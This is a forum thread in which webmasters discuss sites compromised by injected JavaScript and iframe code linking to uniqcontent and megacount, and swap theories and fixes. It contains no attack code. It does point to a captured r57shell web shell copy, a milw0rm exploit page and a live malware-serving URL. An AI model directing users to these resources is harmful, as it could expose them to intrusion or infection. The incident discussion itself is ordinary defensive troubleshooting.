|
Recent uniqcontent / megacount trojan exploits summary
The past couple of weeks I've been seeing this exploit happen to more and more people.
It's either a javascript trojan insertion connecting to uniqcontent.com or an iframe trojan insertion connecting to megacount.com or both.... We have had this happen to a couple customers. Unfortunately each fix has been slighly different. Some of the fixes have been: Getting rid of a counter Getting rid of a 3rd party WordPress template Fixing WordPress file permissions Below are some of the recent threads started: http://www.gfy.com/showthread.php?t=660506 http://www.gofuckyourself.com/showthread.php?t=661811 http://www.gofuckyourself.com/showthread.php?t=662380 http://www.gofuckyourself.com/showthread.php?t=661965 http://www.gofuckyourself.com/showthread.php?t=662468 http://www.gofuckyourself.com/showthread.php?t=664196 Originally people thought this was directly related to WordPress, but it appears to be happening to non WP sites as well. There are 4 or 5 hosts mentioned, so this is not host specific. Then it was thought to be a cPanel issue, but not everyone is running cPanel. dissipate posted these links: http://www.securiteam.com/unixfocus/6R0030UH5W.html http://www.securiteam.com/unixfocus/6M00315H5S.html other suggestions: http://www.securityfocus.com/bid/14088/info http://www.securityfocus.com/bid/18372 No one has really followed up with h0w the issue has been resolved. I'm basically trying to get all the info in to one thread for any others that may come across this exploit. |
Im VERY much in this with you.........
|
Two of my sites were hacked yesterday with this megacount.net expliot hidden and put onto my html pages.
I want to know how they got in... According to Jupiter Hosting whom I host with it appears they simply logged in with a password... Maybe a harvester or something or keystroke logger. But with the epidemic of sites that got hacked in the past few days, Im thinking there must be some security hole somewhere that we dont know about. Im aware of the assumptions of cpanel and wordpress and the others. None of that applies to me... Again, I dont know how they got in. |
Im thinking, and have had it suggested to me to upgrade versions of Apache and php....
There are known security holes in older versions of them, but we have not concluded that this hack is due to any of this... |
As I mentioned my host didnt notice any security breaches.. They noted that someone just logged right in and did this..
Which brings to mind, I think our local PC's have some trojan on them that is recording our logins, or corrupting files as we upload via ftp..... I think this may be more of a local issue rather than a server one?? What do you think? |
List what wordpress pluggins you have installed
its not a vanilla wordpress problem as the exploit isnt *THAT* common |
boneprone isn't running wordpress at all.
|
Anyone without thirdparty software/scripts who got infected?
|
Quote:
|
Quote:
|
but on the other hand....
i was chatting with boneprone and he mentioned that he scanned his computer and found a trojan, and the pages being exploited were ones that he had been working on and had uploaded to his server. so possibly his FTP info was grabbed, or the virus/trojan on his compter was automatically infecting the pages as he uploaded. |
Quote:
I had not uploaded anything to that domain..... So my theory is shot.. Back to step 1. |
Quote:
|
My server Support guy:
"Founnd nudedorms.com/htdocs/aff/geoip.php - r57shell exploit. dated Oct 8, 8:56am I renamed it from geoip.php to geoip.php.txt so it cant be executed, but we can read it. I already made a copy for myself, so delete it if you want. http://nudedorms.com/aff/geoip.php.txt It was owned by webmaster, and not the apache user, so it wasnt a php exploit. A corresponding login during that time was from as the user MuratAT3, Gavin suspected that was one of the hackers IPs, So if it was a weak password, and they guessed it, thats one way they could have done this. Or maybe they somehow got the password via some other way, but one thing is for sure, they just straight up logged in and knew the password, then uploaded their junk. " They are convinced the server wasnt comprimised... But that indeed the hacker got his login and pass from some other means and simply walked on in with info on hand.. And It couldnt have been a corrupt file that I uploaded, casue I never used the username MuratAT3.. ITs an old user name to the box. Naturally its been removed by now.. But thats what these guys used so it seems. |
Hope you get this resolved guys
|
i just had an account on a shared server running hsphere hacked and megacount added :(
tech is working on finding the hole they got in thru. only one account was hacked tho not the whole server. |
Quote:
|
I am still a bit confused by it all.
My hosting company (webair) stated that someone had just logged in with my info. This was my first inital thought and had changed the password, my account was still hacked after this. My password was changed again and now nothing has happend. At all times I had anti virus/trojan/spywear programs running and had scan my system at least 1 time per week and nothing was found. Also - at some times that my site was hacked I did nothing to the site, shut my computers off and took a vacation. But most of the time it was hacked I never even uploaded anything I would just write posts in the blog. |
ok, so 2 times it has been said that someone had logged in to the account and uploaded the infected files.
|
i just read on one of the other boards about someone having the same issue. This is what they said:
"ok here is what my hosting company says: I checked your login history and I see logins from several different addresses, in addition, in the index.html on domain.com it looks like it contains malicious javascript. What I'm guessing happened was someone got your password somehow, then modified your index pages to include this. You can go in and delete it from the index pages." |
i'm seeing some new domains now:
clvcnt.com/nmd/trf/ (DON'T load this, it tries to download a trojan) clvcnt.com/nmd/trf/gc2/ |
xmlrpc no?
|
i believe the trojan downloads:
sploit.anr and xpl.wmf but the issue is how peoples pages are being altered with the code |
My webair accounts are still clean after the update. Imagine how many computers is infected now.
Im sure we will see a drop in sales, because its likely that the Trojan is replacing the affiliate-codes. I think its quite targeted these attacks. ONLY my adult sites have been touched. Its like they scanned for sites that link to selected affiliate programs. |
Quote:
|
Quote:
|
It appears to be another spin on an old php exploit with phpSecurePages.
I'd be interested in knowing if there were any machines hit that did *not* have a copy of the file secure.php anywhere on their server. Here is another version of the one that hit boneprone...from Iranian hackers. http://www.milw0rm.com/exploits/2452 Though the above link is safe, I do not recommend going to any links found in that code (or any other exploit code for that matter). |
Damn, I'm sorry to hear that...
I hope you can fix everything... |
|
buuuuump just got hit AGAIN today
|
| All times are GMT -7. The time now is 07:20 AM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123